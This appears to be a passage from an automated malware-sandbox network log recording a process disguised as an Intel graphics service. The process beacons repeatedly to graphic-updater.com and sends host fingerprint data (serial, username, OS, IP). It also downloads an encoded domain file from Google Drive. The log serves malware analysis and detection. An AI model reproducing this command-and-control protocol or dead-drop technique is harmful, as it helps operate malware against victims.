                                        2022-01-11 16:09:23 UTC27OUTData Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:24 UTC27INHTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:23 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 29
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:24 UTC28INData Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        35192.168.2.44982823.254.131.176443C:\ProgramData\SystemData\igfxCUIService.exe
                                        TimestampkBytes transferredDirectionData
                                        2022-01-11 16:09:24 UTC27OUTPOST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:24 UTC27OUTData Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:24 UTC28INHTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:24 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 28
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:24 UTC28INData Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        36192.168.2.44982923.254.131.176443C:\ProgramData\SystemData\igfxCUIService.exe
                                        TimestampkBytes transferredDirectionData
                                        2022-01-11 16:09:24 UTC28OUTPOST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:24 UTC28OUTData Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:24 UTC28INHTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:24 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 27
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:24 UTC29INData Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        37192.168.2.44983023.254.131.176443C:\ProgramData\SystemData\igfxCUIService.exe
                                        TimestampkBytes transferredDirectionData
                                        2022-01-11 16:09:24 UTC28OUTPOST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:24 UTC28OUTData Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:25 UTC29INHTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:25 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 26
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:25 UTC29INData Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        38192.168.2.44983123.254.131.176443C:\ProgramData\SystemData\igfxCUIService.exe
                                        TimestampkBytes transferredDirectionData
                                        2022-01-11 16:09:25 UTC29OUTPOST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:25 UTC29OUTData Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:25 UTC29INHTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:25 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 25
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:25 UTC30INData Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        39192.168.2.44983223.254.131.176443C:\ProgramData\SystemData\igfxCUIService.exe
                                        TimestampkBytes transferredDirectionData
                                        2022-01-11 16:09:25 UTC29OUTPOST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:25 UTC29OUTData Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:26 UTC30INHTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:25 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 24
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:26 UTC30INData Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        4192.168.2.44979723.254.131.176443C:\ProgramData\SystemData\igfxCUIService.exe
                                        TimestampkBytes transferredDirectionData
                                        2022-01-11 16:09:05 UTC7OUTPOST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:05 UTC7OUTData Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:05 UTC7INHTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:05 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 57
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:05 UTC7INData Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        40192.168.2.44983423.254.131.176443C:\ProgramData\SystemData\igfxCUIService.exe
                                        TimestampkBytes transferredDirectionData
                                        2022-01-11 16:09:26 UTC30OUTPOST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:26 UTC30OUTData Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:26 UTC31INHTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:26 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 22
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:26 UTC31INData Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        41192.168.2.44983523.254.131.176443C:\ProgramData\SystemData\igfxCUIService.exe
                                        TimestampkBytes transferredDirectionData
                                        2022-01-11 16:09:26 UTC30OUTPOST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:26 UTC30OUTData Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:26 UTC30INHTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:26 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 22
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:26 UTC31INData Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        42192.168.2.44983923.254.131.176443C:\ProgramData\SystemData\igfxCUIService.exe
                                        TimestampkBytes transferredDirectionData
                                        2022-01-11 16:09:27 UTC31OUTPOST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:27 UTC31OUTData Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:27 UTC31INHTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:27 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 21
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:27 UTC31INData Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        43192.168.2.44984323.254.131.176443C:\ProgramData\SystemData\igfxCUIService.exe
                                        TimestampkBytes transferredDirectionData
                                        2022-01-11 16:09:27 UTC31OUTPOST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:27 UTC31OUTData Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:28 UTC32INHTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:27 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 20
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:28 UTC32INData Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        44192.168.2.449842142.250.181.238443C:\ProgramData\SystemData\igfxCUIService.exe
                                        TimestampkBytes transferredDirectionData
                                        2022-01-11 16:09:27 UTC31OUTGET /uc?id=1W64PQQxrwY3XjBnv_QAeBQu-ePr537eu HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 0
                                        Host: drive.google.com
                                        2022-01-11 16:09:28 UTC32INHTTP/1.1 302 Moved Temporarily
                                        Content-Type: text/html; charset=UTF-8
                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                        Pragma: no-cache
                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                        Date: Tue, 11 Jan 2022 16:09:28 GMT
                                        Location: https://doc-0k-2o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ot3340k8gdd9p4c62g2sf2iqkmc81t1u/1641917325000/15598710561884722261/*/1W64PQQxrwY3XjBnv_QAeBQu-ePr537eu
                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                        Content-Security-Policy: script-src 'nonce-w9fYkMxXm2PUjN0srnboCA' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                                        Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}
                                        Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"
                                        X-Content-Type-Options: nosniff
                                        X-Frame-Options: SAMEORIGIN
                                        X-XSS-Protection: 1; mode=block
                                        Server: GSE
                                        Set-Cookie: NID=511=c-GfjKO3OhkhEbdJgOPW-ub9e_qRYk_UnfSrRDgyWQsXZ5ii5xw3GHsDrKMO0JVhj72P0Rze_hYcZTe5oLS7UB9J1DsTszM88KBLtYCZF07_0mIp5wUbqjOYYwyGEtu7cU1xBIkHAcXpyEyNaVoUWlpDCz8YkYfyAN7irxXYih0; expires=Wed, 13-Jul-2022 16:09:28 GMT; path=/; domain=.google.com; HttpOnly
                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                        Accept-Ranges: none
                                        Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-Encoding
                                        Connection: close
                                        Transfer-Encoding: chunked
                                        2022-01-11 16:09:28 UTC34INData Raw: 31 37 39 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 2d 30 6b 2d 32 6f 2d 64 6f 63 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 64 6f 63 73 2f 73 65 63 75 72 65 73 63 2f 68 61 30 72 6f 39 33 37 67 63 75 63 37 6c 37 64 65 66 66 6b 73 75 6c 68 67 35 68 37 6d 62 70 31 2f 6f 74 33 33
                                        Data Ascii: 179<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Temporarily</H1>The document has moved <A HREF="https://doc-0k-2o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ot33
                                        2022-01-11 16:09:28 UTC34INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        45192.168.2.44984623.254.131.176443C:\ProgramData\SystemData\igfxCUIService.exe
                                        TimestampkBytes transferredDirectionData
                                        2022-01-11 16:09:28 UTC34OUTPOST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:28 UTC34OUTData Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:28 UTC34INHTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:28 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 19
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:28 UTC35INData Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        46192.168.2.449847142.250.185.129443C:\ProgramData\SystemData\igfxCUIService.exe
                                        TimestampkBytes transferredDirectionData
                                        2022-01-11 16:09:28 UTC34OUTGET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ot3340k8gdd9p4c62g2sf2iqkmc81t1u/1641917325000/15598710561884722261/*/1W64PQQxrwY3XjBnv_QAeBQu-ePr537eu HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 0
                                        Host: doc-0k-2o-docs.googleusercontent.com
                                        2022-01-11 16:09:28 UTC35INHTTP/1.1 200 OK
                                        X-GUploader-UploadID: ADPycdtMVQJ0hG4LLqRwFlsgQl6l3sbmKOjS2U7il6t2dmStf3za2cejsss5KIeeuEtZob-uwZ-Pk-B2mK7lvhybDBI
                                        Access-Control-Allow-Origin: *
                                        Access-Control-Allow-Credentials: false
                                        Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment
                                        Access-Control-Allow-Methods: GET,OPTIONS
                                        Content-Type: text/plain
                                        Content-Disposition: attachment;filename="domain.txt";filename*=UTF-8''domain.txt
                                        Content-Length: 56
                                        Date: Tue, 11 Jan 2022 16:09:28 GMT
                                        Expires: Tue, 11 Jan 2022 16:09:28 GMT
                                        Cache-Control: private, max-age=0
                                        X-Goog-Hash: crc32c=zkaohA==
                                        Server: UploadServer
                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                        Connection: close
                                        2022-01-11 16:09:28 UTC38INData Raw: 4e 6d 73 6a 43 53 41 67 57 53 6c 68 61 56 4d 76 4a 7a 30 53 51 48 35 2b 61 69 55 7a 4d 43 55 70 4b 46 64 71 4f 7a 45 67 49 6a 59 4d 49 32 55 68 43 44 78 6d 46 67 3d 3d
                                        Data Ascii: NmsjCSAgWSlhaVMvJz0SQH5+aiUzMCUpKFdqOzEgIjYMI2UhCDxmFg==


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        47192.168.2.44984923.254.131.176443C:\ProgramData\SystemData\igfxCUIService.exe
                                        TimestampkBytes transferredDirectionData
                                        2022-01-11 16:09:29 UTC38OUTPOST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:29 UTC39OUTData Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:29 UTC39INHTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:29 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 18
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:29 UTC39INData Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        48192.168.2.44985023.254.131.176443C:\ProgramData\SystemData\igfxCUIService.exe
                                        TimestampkBytes transferredDirectionData
                                        2022-01-11 16:09:29 UTC39OUTPOST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:29 UTC39OUTData Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:29 UTC39INHTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:29 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 17
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:29 UTC39INData Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        49192.168.2.44985423.254.131.176443C:\ProgramData\SystemData\igfxCUIService.exe
                                        TimestampkBytes transferredDirectionData
                                        2022-01-11 16:09:29 UTC39OUTPOST /api/attach HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 136
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:29 UTC40OUTData Raw: 73 65 72 69 61 6c 3d 45 43 2d 46 34 2d 42 42 2d 45 41 2d 31 35 2d 38 38 5f 5f 6a 6f 6e 65 73 26 6e 61 6d 65 3d 6a 6f 6e 65 73 26 75 73 65 72 5f 74 6f 6b 65 6e 3d 38 37 32 33 34 37 38 38 37 33 34 38 37 26 6f 73 3d 20 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 20 36 34 2d 62 69 74 20 31 30 2e 30 2e 31 37 31 33 34 26 61 6e 74 69 3d 26 69 70 3d 31 39 32 2e 31 36 38 2e 32 2e 34
                                        Data Ascii: serial=EC-F4-BB-EA-15-88__user&name=user&user_token=8723478873487&os= Microsoft Windows 10 Pro 64-bit 10.0.17134&anti=&ip=192.168.2.4
                                        2022-01-11 16:09:30 UTC40INHTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:30 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 16
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 48
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:30 UTC40INData Raw: 7b 22 74 6f 6b 65 6e 22 3a 22 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34 22 7d
                                        Data Ascii: {"token":"dda3e326-462d-4082-a6bd-07c7f1afd764"}


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        5192.168.2.44979823.254.131.176443C:\ProgramData\SystemData\igfxCUIService.exe
                                        TimestampkBytes transferredDirectionData
                                        2022-01-11 16:09:06 UTC7OUTPOST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
